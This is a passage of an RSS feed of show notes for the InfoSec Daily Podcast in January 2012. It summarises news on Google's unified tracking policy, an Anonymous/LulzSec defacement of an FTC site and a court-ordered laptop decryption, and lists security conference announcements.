<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.washingtonpost.com/business/technology/google-tracks-consumers-across-products-users-cant-opt-out/2012/01/24/gIQArgJHOQ_story.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.washingtonpost.com/business/technology/google-tracks-consumers-across-products-users-cant-opt-out/2012/01/24/gIQArgJHOQ_story.html</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; Google said Tuesday it will follow the activities of users across e-mail, search, YouTube and other services, a shift in strategy that is expected to invite greater scrutiny of its privacy and competitive practices.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The information will enable Google to develop a fuller picture of how people use its growing empire of Web sites. Consumers will have no choice but to accept the changes.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The policy will take effect March 1 and will also impact Android mobile phone users, who are required to log in to Google accounts when they activate their phones.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The changes comes as Google is facing stiff competition for the sometimes fleeting attention of Web surfers. It recently disappointed investors for the first time in several quarters, failing last week to meet earnings predictions. Apple, in contrast, reported record earnings Tuesday, blowing past even the most optimistic expectations.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google&rsquo;s move appears to be aimed squarely at Apple and Facebook &mdash; titans of the tech industry that have been successful in keeping people within their ecosystem of products. Google, which makes money by selling targeted ads, is hoping to do the same by offering a Web experience tailored to personal tastes.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/01/24/antisec_sopa_acta_hack/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/24/antisec_sopa_acta_hack/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous and LulzSec members have hacked US government security web site OnGuard Online and defaced it, forcing it offline, in retaliation for the recent MegaUpload takedown and the controversial Anti-Counterfeiting Trade Agreement (ACTA), the groups have announced.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous has been ramping up its opposition to ACTA on Twitter via the #ActAgainstACTA hashtag and has been a vocal opponent of the US government&rsquo;s move to silence file-sharing site MegaUpload last week and</span><a href="http://www.theregister.co.uk/2012/01/22/kim_dotcom_panic_room/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">arrest</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the men behind it.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Late on Monday local time,</span><a href="https://twitter.com/#%21/AnonymousIRC/status/161675929649807360"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Anonymous tweeted</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from one of its official accounts that it had hacked the OnGuard Online site, which is managed by the Federal Trade Commission and is similar to the UK&rsquo;s Get Safe Online.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the time it defaced the site with a message, also</span><a href="http://pastebin.com/mJWUDtGD"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">posted to Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, detailing its beef with the authorities. The site is now down, presumably as its admins work out how to clean it up while addressing the security flaws which made the hack possible in the first place.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;umad? don&#39;t like it when your site is wiped of the internet do you? If SOPA/PIPA/ACTA passes we will wage a relentless war against the corporate internet, destroying dozens upon dozens of government and company web sites,&rdquo; the message read.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;As you are reading this we are amassing our allied armies of darkness, preparing boatloads of stolen booty for our next raid. We are sitting on hundreds of rooted servers getting ready to drop all your mysql dumps and mail spools. Your passwords? Your precious bank accounts? Even your online dating details?! You ain&#39;t even trying to step to this.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Alongside the message were the email addresses of FTC employees as well as a lengthy log of the hack itself.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack was launched under the banner of the AntiSec campaign waged by members of Anonymous and LulzSec against law enforcement and government agencies since last summer.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-576-encryption-legally-broken-stop-scottish-farmers-no-gps-tracking-no-opt-out-sopaacta-hack/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3412/0/infosec-daily-podcast-episode-576.mp3" length="19076748" type="audio/mpeg" />
		<itunes:duration>0:39:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 576 for January 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 576 for January 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://news.cnet.com/8301-31921_3-57364330-281/judge-americans-can-be-forced-to-decrypt-their-laptops/
Judge Robert Blackburn ordered a Peyton, Colo., woman to decrypt the hard drive of a Toshiba laptop computer no later than February 21&#8211;or face the consequences including contempt of court.

	Blackburn, a George W. Bush appointee, ruled that the Fifth Amendment posed no barrier to his decryption order. The Fifth Amendment says that nobody may be &#34;compelled in any criminal case to be a witness against himself,&#34; which has become known as the right to avoid self-incr[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 575 &#8211; Racist Router, Aaron Gets Axed, G+ Required, Dreamhost’s Nightmare, CBS &amp; Hannibal</title>
		<link>http://www.isdpodcast.com/episode-575-racist-router-aaron-gets-axed-g-required-dreamhosts-nightmare-cbs-hannibal</link>
		<comments>http://www.isdpodcast.com/episode-575-racist-router-aaron-gets-axed-g-required-dreamhosts-nightmare-cbs-hannibal#comments</comments>
		<pubDate>Tue, 24 Jan 2012 02:10:04 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3408</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 575 for January 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 575 for January 23, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
